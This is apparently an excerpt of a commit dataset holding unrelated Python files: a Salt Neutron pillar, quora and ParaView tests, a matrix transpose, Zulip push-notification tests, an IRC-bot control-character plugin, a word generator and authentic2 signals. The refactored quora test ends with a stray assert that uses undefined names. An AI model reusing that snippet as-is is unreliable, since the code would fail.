            logger.debug('Updated: {} with {}'.format(len(google_similar), count + 1))

        with open(filename, 'w') as admin_file:
            for key in result_dict:
                admin_file.write('{};{}\n'.format(key, result_dict[key]))
        return apps, similar_apps, similar_apps_count
| apache-2.0 | Python | |
023e88f264274211674a100820d590dcee694445 | Allow neutron network list to be used as pillar data | saltstack/salt,saltstack/salt,saltstack/salt,saltstack/salt,saltstack/salt | salt/pillar/neutron.py | salt/pillar/neutron.py | # -*- coding: utf-8 -*-
'''
Use Openstack Neutron data as a Pillar source. Will list all networks listed
inside of Neutron, to all minions.
.. versionadded:: Beryllium
:depends: - python-neutronclient
A keystone profile must be used for the pillar to work (no generic keystone
configuration here).
For example::
my openstack_config:
keystone.user: 'admin'
keystone.password: 'password'
keystone.tenant: 'admin'
keystone.auth_url: 'http://127.0.0.1:5000/v2.0/'
keystone.region_name: 'RegionOne'
keystone.service_type: 'network'
After the profile is created, configure the external pillar system to use it.
.. code-block:: yaml
ext_pillar:
- neutron: my_openstack_config
Using these configuration profiles, multiple neutron sources may also be used:
.. code-block:: yaml
ext_pillar:
- neutron: my_openstack_config
- neutron: my_other_openstack_config
By default, these networks will be returned as a pillar item called
``networks``. In order to have them returned under a different name, add the
name after the Keystone profile name:
ext_pillar:
- neutron: my_openstack_config neutron_networks
'''
# Import python libs
import logging
# Import third party libs
try:
    import salt.utils.openstack.neutron as suoneu
    HAS_NEUTRON = True
except ImportError:
    # A failed import raises ImportError, not NameError; catching the wrong
    # exception let the ImportError escape and break pillar loading whenever
    # python-neutronclient was absent.
    HAS_NEUTRON = False
# Set up logging
log = logging.getLogger(__name__)
def __virtual__():
    '''
    Only return if python-neutronclient is installed
    '''
    # Salt loader hook: a falsey return hides this ext_pillar module.
    return HAS_NEUTRON
def _auth(profile=None):
    '''
    Set up neutron credentials

    Reads the keystone.* options from the named config profile and
    returns a connected SaltNeutron client.
    '''
    credentials = __salt__['config.option'](profile)
    kwargs = {
        'username': credentials['keystone.user'],
        'password': credentials['keystone.password'],
        'tenant_name': credentials['keystone.tenant'],
        'auth_url': credentials['keystone.auth_url'],
        # region is optional; the other keystone.* keys are required
        'region_name': credentials.get('keystone.region_name', None),
        'service_type': credentials['keystone.service_type'],
    }

    return suoneu.SaltNeutron(**kwargs)
def ext_pillar(minion_id,
               pillar,  # pylint: disable=W0613
               conf):
    '''
    Check neutron for all data

    `conf` is the ext_pillar config string: "<profile> [<pillar key>]".
    Returns {<pillar key>: {<network name>: <network dict>, ...}}.

    NOTE(review): `comps[0]` raises IndexError when conf is an empty
    string — confirm upstream always passes at least the profile name.
    '''
    comps = conf.split()

    profile = None
    if comps[0]:
        profile = comps[0]

    conn = _auth(profile)
    ret = {}
    # index every neutron network by its name
    networks = conn.list_networks()
    for network in networks['networks']:
        ret[network['name']] = network

    # default pillar key when none was configured
    if len(comps) < 2:
        comps.append('networks')

    return {comps[1]: ret}
| apache-2.0 | Python | |
6df4cdd8fe629fabadd792d0b7507a57f9dc37b7 | refactor tests | sumit12dec/pyquora,iammxt/pyquora,rohithpr/pyquora | tests/test_helper_functions.py | tests/test_helper_functions.py | import quora
class TestHelperFunctions:
    """Unit tests for quora helper functions."""

    def test_try_cast_int(self):
        """try_cast_int parses plain counts, k-suffixed counts and HTML spans."""
        cases = [
            ('200 Upvotes', 200),
            ('2k Upvotes', 2000),
            ('2 K Upvotes', 2000),
            ('2.3k Upvotes', 2300),
            ('2.3 K Upvotes', 2300),
            ('<span class="count">3</span>', 3),
        ]
        # pair inputs with expectations directly instead of indexing two
        # parallel lists with range(len(...))
        for text, expected in cases:
            assert quora.try_cast_int(text) == expected
assert quora.try_cast_int(input_strings[i]) == expected[i] | import quora
def test_try_cast_int():
assert quora.try_cast_int('200 Upvotes') == 200
assert quora.try_cast_int('2k Upvotes') == 2000
assert quora.try_cast_int('2 K Upvotes') == 2000
assert quora.try_cast_int('2.3k Upvotes') == 2300
assert quora.try_cast_int('2.3 K Upvotes') == 2300
assert quora.try_cast_int('<span class="count">3</span>') == 3
test_try_cast_int() | agpl-3.0 | Python |
2b0ade5407902c2b8d8a0853967bbe01c9e38e7e | test file for paraview functions | PMEAL/OpenPNM | tests/unit/io/test_paraview.py | tests/unit/io/test_paraview.py | import os
import sys
import pytest
import numpy as np
import porespy as ps
import openpnm as op
from numpy.testing import assert_allclose
import psutil
from openpnm.io.__paraview__ import export_data
from openpnm.io.__paraview__ import open_paraview
class ExportTest():
    def setup_class(self):
        # directory the test script was launched from
        self.path = os.path.dirname(os.path.abspath(sys.argv[0]))

    def test_export_data(self):
        """Exporting a porespy image should produce a .pvsm state file."""
        im = ps.generators.blobs(shape=[50, 50, 50], spacing=0.1)
        export_data(im=im, filename='test_to_paraview.pvsm')
        # clean up the generated file
        os.remove('test_to_paraview.pvsm')

    def test_open_paraview(self):
        """Opening a state file should launch a paraview process."""
        open_paraview(filename='../fixtures/image.pvsm')
        # process inspection is skipped on macOS ("darwin")
        if sys.platform != "darwin":
            assert "paraview" in (p.name().split('.')[0] for p in psutil.process_iter())
if __name__ == "__main__":
t = ExportTest()
self = t
t.setup_class()
for item in t.__dir__():
if item.startswith("test"):
print(f"Running test: {item}")
t.__getattribute__(item)()
| mit | Python | |
1f281a1279b7b185559d9d267a69ea24024c633e | Transpose of a Matrix | ZoranPandovski/al-go-rithms,ZoranPandovski/al-go-rithms,ZoranPandovski/al-go-rithms,ZoranPandovski/al-go-rithms,ZoranPandovski/al-go-rithms,ZoranPandovski/al-go-rithms,ZoranPandovski/al-go-rithms,ZoranPandovski/al-go-rithms,ZoranPandovski/al-go-rithms,ZoranPandovski/al-go-rithms,ZoranPandovski/al-go-rithms,ZoranPandovski/al-go-rithms,ZoranPandovski/al-go-rithms,ZoranPandovski/al-go-rithms,ZoranPandovski/al-go-rithms,ZoranPandovski/al-go-rithms,ZoranPandovski/al-go-rithms,ZoranPandovski/al-go-rithms,ZoranPandovski/al-go-rithms,ZoranPandovski/al-go-rithms | math/Matrix/Python/transpose.py | math/Matrix/Python/transpose.py | """ Transpose of a Matrix
Following is simpler code for the transpose
of a matrix, using the NumPy library for Python.
The transpose of a matrix swaps its rows and columns:
[[a,b,c],
[d,e,f]]
would be written as:
[[a,d],
[b,e],
[c,f]]
This comes into extensive use when we work with matrices in ML. """
import numpy as np
# We have imported the NUMPY library using above SYNTAX.
def Transpose(mat):
    """Return *mat* with rows and columns swapped, as a NumPy array."""
    # np.asarray converts the (possibly nested-list) input to an array,
    # and the .T attribute yields its transpose.
    return np.asarray(mat).T
""" Let us declare a matrix and we will see the output
>>>mat=[[1,2,3],
[4,5,6]]
>>>print(Transpose(mat))
OUTPUT:
>>>
[[1 4]
[2 5]
[3 6]]
>>>mat=[['a','b','c'],
['d','e','f']]
>>>print(Transpose(mat))
OUTPUT:
>>>
[['a' 'd']
['b' 'e']
['c' 'f']]
"""
| cc0-1.0 | Python | |
bf98a5d06436a905aa5710db4a60f1e6b7c8f7fc | Add link local plugin | Daksh/sugar-toolkit-gtk3,quozl/sugar-toolkit-gtk3,gusDuarte/sugar-toolkit-gtk3,tchx84/sugar-toolkit-gtk3,i5o/sugar-toolkit-gtk3,quozl/sugar-toolkit-gtk3,sugarlabs/sugar-toolkit,quozl/sugar-toolkit-gtk3,i5o/sugar-toolkit-gtk3,samdroid-apps/sugar-toolkit-gtk3,puneetgkaur/backup_sugar_sugartoolkit,ceibal-tatu/sugar-toolkit,tchx84/sugar-toolkit-gtk3,Daksh/sugar-toolkit-gtk3,sugarlabs/sugar-toolkit-gtk3,sugarlabs/sugar-toolkit-gtk3,samdroid-apps/sugar-toolkit-gtk3,tchx84/debian-pkg-sugar-toolkit-gtk3,ceibal-tatu/sugar-toolkit-gtk3,sugarlabs/sugar-toolkit,i5o/sugar-toolkit-gtk3,sugarlabs/sugar-toolkit-gtk3,manuq/sugar-toolkit-gtk3,puneetgkaur/backup_sugar_sugartoolkit,godiard/sugar-toolkit-gtk3,tchx84/debian-pkg-sugar-toolkit,ceibal-tatu/sugar-toolkit,puneetgkaur/sugar-toolkit-gtk3,sugarlabs/sugar-toolkit,gusDuarte/sugar-toolkit-gtk3,tchx84/debian-pkg-sugar-toolkit,i5o/sugar-toolkit-gtk3,gusDuarte/sugar-toolkit-gtk3,ceibal-tatu/sugar-toolkit-gtk3,gusDuarte/sugar-toolkit-gtk3,samdroid-apps/sugar-toolkit-gtk3,quozl/sugar-toolkit-gtk3,puneetgkaur/sugar-toolkit-gtk3,sugarlabs/sugar-toolkit,tchx84/debian-pkg-sugar-toolkit-gtk3,puneetgkaur/sugar-toolkit-gtk3,manuq/sugar-toolkit-gtk3,ceibal-tatu/sugar-toolkit-gtk3,godiard/sugar-toolkit-gtk3,tchx84/debian-pkg-sugar-toolkit,godiard/sugar-toolkit-gtk3,manuq/sugar-toolkit-gtk3,tchx84/sugar-toolkit-gtk3,puneetgkaur/backup_sugar_sugartoolkit,tchx84/debian-pkg-sugar-toolkit-gtk3,ceibal-tatu/sugar-toolkit,Daksh/sugar-toolkit-gtk3,samdroid-apps/sugar-toolkit-gtk3 | services/presence2/linklocal_plugin.py | services/presence2/linklocal_plugin.py | # Copyright (C) 2007, Red Hat, Inc.
# Copyright (C) 2007, Collabora Ltd.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import gobject
class LinkLocalPlugin(gobject.GObject):
    # Skeleton presence plugin for link-local networks; currently only
    # stores the plugin registry it was constructed with.
    def __init__(self, registry):
        gobject.GObject.__init__(self)
        self._registry = registry
| lgpl-2.1 | Python | |
2ab796aeb53e650b8a1dd828b5daaca16850d9c3 | Add tests for APNS message. | hackerkid/zulip,ahmadassaf/zulip,vaidap/zulip,peguin40/zulip,AZtheAsian/zulip,dhcrzf/zulip,brainwane/zulip,ahmadassaf/zulip,rishig/zulip,sharmaeklavya2/zulip,dattatreya303/zulip,calvinleenyc/zulip,jphilipsen05/zulip,j831/zulip,sonali0901/zulip,eeshangarg/zulip,synicalsyntax/zulip,jrowan/zulip,punchagan/zulip,verma-varsha/zulip,vabs22/zulip,mohsenSy/zulip,rishig/zulip,rishig/zulip,cosmicAsymmetry/zulip,Juanvulcano/zulip,ahmadassaf/zulip,punchagan/zulip,sup95/zulip,shubhamdhama/zulip,mahim97/zulip,Juanvulcano/zulip,kou/zulip,cosmicAsymmetry/zulip,dhcrzf/zulip,rht/zulip,j831/zulip,susansls/zulip,niftynei/zulip,calvinleenyc/zulip,hackerkid/zulip,Galexrt/zulip,tommyip/zulip,jainayush975/zulip,grave-w-grave/zulip,dhcrzf/zulip,blaze225/zulip,Jianchun1/zulip,dhcrzf/zulip,hackerkid/zulip,umkay/zulip,reyha/zulip,tommyip/zulip,paxapy/zulip,jackrzhang/zulip,souravbadami/zulip,krtkmj/zulip,rishig/zulip,susansls/zulip,grave-w-grave/zulip,verma-varsha/zulip,amanharitsh123/zulip,kou/zulip,vaidap/zulip,umkay/zulip,sonali0901/zulip,susansls/zulip,vaidap/zulip,vikas-parashar/zulip,timabbott/zulip,isht3/zulip,souravbadami/zulip,aakash-cr7/zulip,kou/zulip,brainwane/zulip,JPJPJPOPOP/zulip,mahim97/zulip,reyha/zulip,shubhamdhama/zulip,kou/zulip,christi3k/zulip,jphilipsen05/zulip,aakash-cr7/zulip,umkay/zulip,jrowan/zulip,krtkmj/zulip,mohsenSy/zulip,tommyip/zulip,andersk/zulip,sup95/zulip,sup95/zulip,verma-varsha/zulip,Diptanshu8/zulip,peguin40/zulip,isht3/zulip,mohsenSy/zulip,christi3k/zulip,jackrzhang/zulip,KingxBanana/zulip,vabs22/zulip,andersk/zulip,vabs22/zulip,dawran6/zulip,andersk/zulip,AZtheAsian/zulip,Galexrt/zulip,Juanvulcano/zulip,KingxBanana/zulip,brockwhittaker/zulip,dawran6/zulip,punchagan/zulip,jrowan/zulip,jphilipsen05/zulip,brainwane/zulip,samatdav/zulip,blaze225/zulip,brainwane/zulip,jainayush975/zulip,calvinleenyc/zulip,isht3/zulip,amyliu345/zulip,eeshangarg/zulip,synicalsyntax/zulip,vikas-parashar/zu
lip,synicalsyntax/zulip,Diptanshu8/zulip,dawran6/zulip,vikas-parashar/zulip,amanharitsh123/zulip,j831/zulip,peguin40/zulip,isht3/zulip,KingxBanana/zulip,brockwhittaker/zulip,SmartPeople/zulip,ryanbackman/zulip,sup95/zulip,blaze225/zulip,souravbadami/zulip,mahim97/zulip,brainwane/zulip,TigorC/zulip,TigorC/zulip,shubhamdhama/zulip,timabbott/zulip,blaze225/zulip,amanharitsh123/zulip,niftynei/zulip,vaidap/zulip,ryanbackman/zulip,KingxBanana/zulip,zacps/zulip,vikas-parashar/zulip,ahmadassaf/zulip,calvinleenyc/zulip,jackrzhang/zulip,zulip/zulip,synicalsyntax/zulip,krtkmj/zulip,jphilipsen05/zulip,rht/zulip,joyhchen/zulip,joyhchen/zulip,sharmaeklavya2/zulip,tommyip/zulip,zacps/zulip,cosmicAsymmetry/zulip,paxapy/zulip,grave-w-grave/zulip,brainwane/zulip,rht/zulip,rht/zulip,christi3k/zulip,sonali0901/zulip,jackrzhang/zulip,JPJPJPOPOP/zulip,showell/zulip,JPJPJPOPOP/zulip,umkay/zulip,timabbott/zulip,arpith/zulip,zulip/zulip,SmartPeople/zulip,sup95/zulip,showell/zulip,amanharitsh123/zulip,aakash-cr7/zulip,zacps/zulip,KingxBanana/zulip,TigorC/zulip,blaze225/zulip,joyhchen/zulip,arpith/zulip,rishig/zulip,sharmaeklavya2/zulip,eeshangarg/zulip,Jianchun1/zulip,aakash-cr7/zulip,jrowan/zulip,timabbott/zulip,dhcrzf/zulip,reyha/zulip,joyhchen/zulip,Juanvulcano/zulip,dawran6/zulip,niftynei/zulip,andersk/zulip,sharmaeklavya2/zulip,amyliu345/zulip,punchagan/zulip,arpith/zulip,SmartPeople/zulip,paxapy/zulip,jainayush975/zulip,hackerkid/zulip,arpith/zulip,rishig/zulip,Diptanshu8/zulip,sharmaeklavya2/zulip,andersk/zulip,hackerkid/zulip,mohsenSy/zulip,dattatreya303/zulip,Diptanshu8/zulip,niftynei/zulip,krtkmj/zulip,jrowan/zulip,punchagan/zulip,vaidap/zulip,calvinleenyc/zulip,synicalsyntax/zulip,Jianchun1/zulip,zulip/zulip,eeshangarg/zulip,cosmicAsymmetry/zulip,grave-w-grave/zulip,souravbadami/zulip,jphilipsen05/zulip,eeshangarg/zulip,vabs22/zulip,mohsenSy/zulip,dattatreya303/zulip,AZtheAsian/zulip,SmartPeople/zulip,vikas-parashar/zulip,joyhchen/zulip,niftynei/zulip,arpith/zulip,Juanvulcano/zuli
p,Galexrt/zulip,dhcrzf/zulip,umkay/zulip,brockwhittaker/zulip,hackerkid/zulip,susansls/zulip,ahmadassaf/zulip,zacps/zulip,timabbott/zulip,Diptanshu8/zulip,samatdav/zulip,ryanbackman/zulip,isht3/zulip,rht/zulip,amyliu345/zulip,mahim97/zulip,SmartPeople/zulip,verma-varsha/zulip,PhilSk/zulip,dawran6/zulip,reyha/zulip,zulip/zulip,AZtheAsian/zulip,ahmadassaf/zulip,kou/zulip,zulip/zulip,jackrzhang/zulip,samatdav/zulip,Galexrt/zulip,PhilSk/zulip,grave-w-grave/zulip,verma-varsha/zulip,showell/zulip,dattatreya303/zulip,synicalsyntax/zulip,j831/zulip,andersk/zulip,mahim97/zulip,paxapy/zulip,sonali0901/zulip,timabbott/zulip,showell/zulip,KingxBanana/zulip,dawran6/zulip,PhilSk/zulip,aakash-cr7/zulip,Jianchun1/zulip,krtkmj/zulip,hackerkid/zulip,souravbadami/zulip,vikas-parashar/zulip,arpith/zulip,christi3k/zulip,dattatreya303/zulip,brockwhittaker/zulip,reyha/zulip,calvinleenyc/zulip,christi3k/zulip,timabbott/zulip,grave-w-grave/zulip,sonali0901/zulip,umkay/zulip,zacps/zulip,TigorC/zulip,eeshangarg/zulip,amanharitsh123/zulip,punchagan/zulip,amyliu345/zulip,mahim97/zulip,samatdav/zulip,showell/zulip,PhilSk/zulip,niftynei/zulip,Galexrt/zulip,zacps/zulip,dattatreya303/zulip,peguin40/zulip,zulip/zulip,Jianchun1/zulip,joyhchen/zulip,vabs22/zulip,tommyip/zulip,blaze225/zulip,krtkmj/zulip,Galexrt/zulip,jackrzhang/zulip,vabs22/zulip,jainayush975/zulip,Diptanshu8/zulip,rht/zulip,ryanbackman/zulip,TigorC/zulip,andersk/zulip,PhilSk/zulip,samatdav/zulip,susansls/zulip,peguin40/zulip,umkay/zulip,peguin40/zulip,j831/zulip,souravbadami/zulip,sup95/zulip,Galexrt/zulip,zulip/zulip,JPJPJPOPOP/zulip,cosmicAsymmetry/zulip,paxapy/zulip,showell/zulip,cosmicAsymmetry/zulip,susansls/zulip,shubhamdhama/zulip,TigorC/zulip,kou/zulip,j831/zulip,sonali0901/zulip,showell/zulip,amanharitsh123/zulip,brainwane/zulip,tommyip/zulip,paxapy/zulip,brockwhittaker/zulip,synicalsyntax/zulip,jrowan/zulip,AZtheAsian/zulip,ryanbackman/zulip,amyliu345/zulip,rishig/zulip,jphilipsen05/zulip,jainayush975/zulip,shubhamdhama/zul
ip,amyliu345/zulip,SmartPeople/zulip,reyha/zulip,eeshangarg/zulip,ahmadassaf/zulip,isht3/zulip,dhcrzf/zulip,punchagan/zulip,aakash-cr7/zulip,JPJPJPOPOP/zulip,jainayush975/zulip,sharmaeklavya2/zulip,PhilSk/zulip,vaidap/zulip,ryanbackman/zulip,JPJPJPOPOP/zulip,tommyip/zulip,Juanvulcano/zulip,AZtheAsian/zulip,christi3k/zulip,shubhamdhama/zulip,mohsenSy/zulip,brockwhittaker/zulip,samatdav/zulip,krtkmj/zulip,jackrzhang/zulip,kou/zulip,verma-varsha/zulip,Jianchun1/zulip,shubhamdhama/zulip,rht/zulip | zerver/tests/test_push_notifications.py | zerver/tests/test_push_notifications.py | import mock
from django.test import TestCase
from django.conf import settings
from zerver.models import PushDeviceToken, UserProfile
from zerver.models import get_user_profile_by_email
from zerver.lib import push_notifications as apn
from zerver.lib.redis_utils import get_redis_client
class PushNotificationTest(TestCase):
    # Shared fixture: registers two APNS device tokens for hamlet and
    # swaps the APNS connections for fakes so no network traffic occurs.
    def setUp(self):
        email = 'hamlet@zulip.com'
        self.redis_client = get_redis_client()
        apn.connection = apn.get_connection('fake-cert', 'fake-key')
        apn.dbx_connection = apn.get_connection('fake-cert', 'fake-key')
        self.user_profile = get_user_profile_by_email(email)
        self.tokens = ['aaaa', 'bbbb']
        for token in self.tokens:
            PushDeviceToken.objects.create(
                kind=PushDeviceToken.APNS,
                token=apn.hex_to_b64(token),
                user=self.user_profile,
                ios_app_id=settings.ZULIP_IOS_APP_ID)

    def tearDown(self):
        # remove the redis entries created for the mocked message ids
        # (100 and 200, matching the patched getrandbits values)
        for i in [100, 200]:
            self.redis_client.delete(apn.get_apns_key(i))
class APNsMessageTest(PushNotificationTest):
    # Patch random.getrandbits so the two message ids are deterministic
    # (100 then 200), making the redis keys predictable.
    @mock.patch('random.getrandbits', side_effect=[100, 200])
    def test_apns_message(self, mock_getrandbits):
        """Creating an APNsMessage stores one redis hash per device token."""
        apn.APNsMessage(self.user_profile, self.tokens, alert="test")
        data = self.redis_client.hgetall(apn.get_apns_key(100))
        self.assertEqual(data['token'], 'aaaa')
        self.assertEqual(int(data['user_id']), self.user_profile.id)
        data = self.redis_client.hgetall(apn.get_apns_key(200))
        self.assertEqual(data['token'], 'bbbb')
        self.assertEqual(int(data['user_id']), self.user_profile.id)
| apache-2.0 | Python | |
6064180a636ecbf5e25742b87fe1f2365ea1e8b5 | add controlchar plugin | melmothx/jsonbot,melmothx/jsonbot,melmothx/jsonbot | commonplugs/controlchar.py | commonplugs/controlchar.py | # commonplugs/controlchar.pu
#
#
"""
command to control the control (command) characters. The cc is a string
containing the allowed control characters.
"""
from gozerlib.commands import cmnds
from gozerlib.examples import examples
def handle_cc(bot, ievent):
    """ cc [<controlchar>] .. set/get control character of channel. """
    try:
        what = ievent.args[0]
        # Changing the control char requires operator rights.
        if not bot.users.allowed(ievent.userhost, 'OPER'):
            return
        if len(what) > 1:
            ievent.reply("only one character is allowed")
            return
        try:
            ievent.chan.data.cc = what
        except (KeyError, TypeError):
            # BUG FIX: the original referenced an undefined name `chan`
            # here, which raised NameError instead of replying.
            ievent.reply("no channel %s in database" % ievent.channel)
            return
        ievent.chan.save()
        ievent.reply('control char set to %s' % what)
    except IndexError:
        # no argument given .. show cc of channel command is given in
        try:
            cchar = ievent.chan.data.cc
            ievent.reply('control character(s) for channel %s are/is %s' % (ievent.channel, cchar))
        except (KeyError, TypeError):
            ievent.reply("default cc is %s" % bot.cfg['defaultcc'])
cmnds.add('cc', handle_cc, 'USER')
examples.add('cc', 'set control char of channel or show control char of channel','1) cc ! 2) cc')
def handle_ccadd(bot, ievent):
    """ add a control char to the channels cc list. """
    try:
        what = ievent.args[0]
        if not bot.users.allowed(ievent.userhost, 'OPER'):
            return
        if len(what) > 1:
            ievent.reply("only one character is allowed")
            return
        try:
            # NOTE(review): assumes chan.data already has a cc value;
            # a missing attribute would raise AttributeError, which is
            # not caught here -- confirm chan.data semantics.
            ievent.chan.data.cc += what
        except (KeyError, TypeError):
            # BUG FIX: the original referenced an undefined name `chan`
            # here, which raised NameError instead of replying.
            ievent.reply("no channel %s in database" % ievent.channel)
            return
        ievent.chan.save()
        ievent.reply('control char %s added' % what)
    except IndexError:
        ievent.missing('<cc> [<channel>]')
cmnds.add('cc-add', handle_ccadd, 'OPER', allowqueue=False)
examples.add('cc-add', 'cc-add <control char> .. add control character', 'cc-add #')
def handle_ccdel(bot, ievent):
    """ remove a control char from the channels cc list. """
    try:
        what = ievent.args[0]
        if not bot.users.allowed(ievent.userhost, 'OPER'):
            return
        if len(what) > 1:
            ievent.reply("only one character is allowed")
            return
        try:
            # BUG FIX: the original read `event.chan.data.cc` (undefined
            # name `event`), so this line always raised NameError.
            ievent.chan.data.cc = ievent.chan.data.cc.replace(what, '')
        except KeyError:
            # BUG FIX: the original reply left the %s placeholder
            # unfilled ("no channel %s in database").
            ievent.reply("no channel %s in database" % ievent.channel)
            return
        except TypeError:
            # BUG FIX: the original referenced an undefined name `chan`.
            ievent.reply("no channel %s in database" % ievent.channel)
            return
        ievent.chan.save()
        ievent.reply('control char %s deleted' % what)
    except IndexError:
        ievent.missing('<cc> [<channel>]')
cmnds.add('cc-del', handle_ccdel, 'OPER')
examples.add('cc-del', 'cc-del <control character> .. remove cc', 'cc-del #')
| mit | Python | |
f491db91ed2608698d2d91558f41f544819684bf | Add python-copy to calvinsys | les69/calvin-base,les69/calvin-base,EricssonResearch/calvin-base,les69/calvin-base,EricssonResearch/calvin-base,EricssonResearch/calvin-base,EricssonResearch/calvin-base,les69/calvin-base | calvin/calvinsys/native/python-copy.py | calvin/calvinsys/native/python-copy.py | # -*- coding: utf-8 -*-
# Copyright (c) 2015 Ericsson AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import types
class Copy(object):
    """Expose the public functions of the stdlib ``copy`` module
    (``copy``, ``deepcopy``, ...) as attributes of a calvinsys object."""

    # Snapshot every public function of the copy module, keyed by name.
    _copy = {
        name: getattr(copy, name)
        for name in dir(copy) if not name.startswith('_') and isinstance(getattr(copy, name), types.FunctionType)
    }

    def __getattr__(self, attr):
        # Delegate unknown attribute lookups to the snapshot, so that
        # e.g. obj.deepcopy(x) calls copy.deepcopy(x).
        if attr in self._copy:
            return self._copy[attr]
        raise AttributeError(attr)

    def show_module(self):
        """Print the source code of the stdlib copy module."""
        import inspect
        # BUG FIX for portability: the original used the Python-2-only
        # print statement; print() with one argument behaves identically
        # on Python 2 and Python 3.
        print(inspect.getsource(copy))
def register(node=None, actor=None):
    # Calvinsys factory hook: *node* and *actor* are accepted for API
    # compatibility but unused; every caller receives a fresh Copy wrapper.
    return Copy()
| apache-2.0 | Python | |
5975fc773b1dff894fbd3f9dcff34c88dd52a17b | Create Random-Word-Constructor.py | jweinst1/Random-Word-Generator,jweinst1/Random-Word-Generator | Random-Word-Constructor.py | Random-Word-Constructor.py | import random
"""A Random Word Generator that uses a built-in algorithm that follows the syllable rules
in the English language. Useful for finding a creative name for a business or app."""
alphabet = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']
vowels = ['a', 'e', 'i', 'o', 'u']
consensnts = [x for x in alphabet if x not in vowels]
starting_letters = ['c', 'd', 'g', 'h', 'i', 'j', 'l', 'm', 'n', 'p', 'q', 'r', 's', 't', 'v', 'y', 'z' ]
class Random_Word_Constructor (object):
    """Builds pronounceable pseudo-words by chaining letters according to
    simple English letter-adjacency rules, and files the generated words
    into a dictionary keyed by their first letter."""

    def __init__(self, maxlength):
        # Maximum number of letters per generated word.
        self.maxlength = maxlength
        # Maps first letter -> list of words generated so far.
        self.dictionary = {}
        # Letters a word may start with ('x' and 'u' excluded).
        self.start = [x for x in alphabet if x != 'x' and x != 'u']
        # Seed the word with one random starting letter.
        self.word = random.choice(self.start)
        # Consonants that are always followed by a vowel.
        self.preceed_Vowel_letters = ['b', 'd', 'j', 'w', 'z', 'q']
        # Per-vowel follower tables: letters allowed after each vowel.
        self.a = [x for x in alphabet if x != 'a' and x != 'h' and x != 'u']
        self.e = [x for x in alphabet if x != 'h']
        self.i = [x for x in alphabet if x != 'i' and x != 'h' and x != 'u' and x != 'y']
        self.o = [x for x in alphabet if x != 'a' and x != 'e' and x != 'i' and x != 'y']
        self.u = [x for x in consensnts if x != 'y' and x != 'u']
        self.y = ['o', 'a', 'e', 'u']
        # Letters allowed after a generic consonant.
        self.cons_next = ['a', 'i', 'e', 'o', 'u', 't', 'r']

    def construct_word(self):
        """Extend self.word letter by letter up to maxlength and return it."""
        while len(self.word) < self.maxlength:
            if len(self.word) >= 2:
                # Break up runs: two vowels get a consonant, two consonants
                # get a vowel.  BUG FIX: the original wrote
                # `self.word[-2] and self.word[-1] in vowels`, which parses
                # as `self.word[-2] and (self.word[-1] in vowels)` and so
                # only ever tested the last letter.
                if self.word[-2] in vowels and self.word[-1] in vowels:
                    self.word += random.choice(consensnts)
                if self.word[-2] in consensnts and self.word[-1] in consensnts:
                    self.word += random.choice(vowels)
            if self.word[-1] in vowels:
                # Cascading checks re-test the (possibly new) last letter,
                # preserved from the original structure.
                if self.word[-1] == 'a':
                    self.word += random.choice(self.a)
                if self.word[-1] == 'e':
                    self.word += random.choice(self.e)
                if self.word[-1] == 'i':
                    self.word += random.choice(self.i)
                if self.word[-1] == 'o':
                    self.word += random.choice(self.o)
                if self.word[-1] == 'u':
                    self.word += random.choice(self.u)
            if self.word[-1] in consensnts:
                if self.word[-1] in self.preceed_Vowel_letters:
                    self.word += random.choice(vowels)
                if self.word[-1] == 'y':
                    self.word += random.choice(self.y)
                else:
                    self.word += random.choice(self.cons_next)
        # Trim any overshoot from the final append.
        self.word = self.word[:self.maxlength]
        return self.word

    def add_to_dictionary(self):
        """File the current word under its first letter, then reseed."""
        self.dictionary.setdefault(self.word[0], []).append(self.word)
        self.word = random.choice(self.start)
def Random_Word(maxlength):
    """Build and return one random word of at most *maxlength* letters."""
    generator = Random_Word_Constructor(maxlength)
    return generator.construct_word()
def Random_Dictionary(entries, maxlength):
    """Generate *entries* random words (each at most *maxlength* letters),
    group them by first letter, and print each first-letter bucket.

    Returns None; output goes to stdout.
    """
    builder = Random_Word_Constructor(maxlength)
    # for/range replaces the original manual while/counter loop.
    for _ in range(entries):
        builder.construct_word()
        builder.add_to_dictionary()
    for letter, words in builder.dictionary.items():
        # BUG FIX for portability: the original `print k, v` is
        # Python-2-only syntax; this formatted print produces the same
        # "<letter> <word list>" output on Python 2 and 3.
        print('%s %s' % (letter, words))
| mit | Python | |
f62f8971bcaddc93cf9993e7ff0e4bfd70e0735d | Connect attribute filling signal to profile to dic function. | adieu/authentic2,BryceLohr/authentic,pu239ppy/authentic2,pu239ppy/authentic2,adieu/authentic2,pu239ppy/authentic2,pu239ppy/authentic2,adieu/authentic2,BryceLohr/authentic,adieu/authentic2,BryceLohr/authentic,BryceLohr/authentic | authentic2/idp/signals.py | authentic2/idp/signals.py | from django.dispatch import Signal
from django.conf import settings
from authentic2.idp.attributes import provide_attributes_at_sso, \
provide_attributes_of_user_profile
'''authorize_decision
Expect a dictionnaries as return with:
- the authorization decision e.g. dic['authz'] = True or False
- optionnaly a message e.g. dic['message'] = message
'''
authorize_service = Signal(providing_args = ["request", "user", "audience"])
'''add_attributes_to_response
This signal is used by asynchronous bindings that do not receive attribute
list in the request. That means that a predefined list is defined.
The asynchronous binding means that the user is "on" the IdP to bring the
request then it is possible to take attributes in the Django session.
Mainly, it is usable at SSO request treatment.
The signal is send with parameters:
- request: The request having triggerred a need of attribute
- user: instance of the User Django Model to indicate the subject of
attributes. Maybe different from request.user if any.
- We should here only use a username in case that we want to provide
attributes for entities having no corresponding User instance.
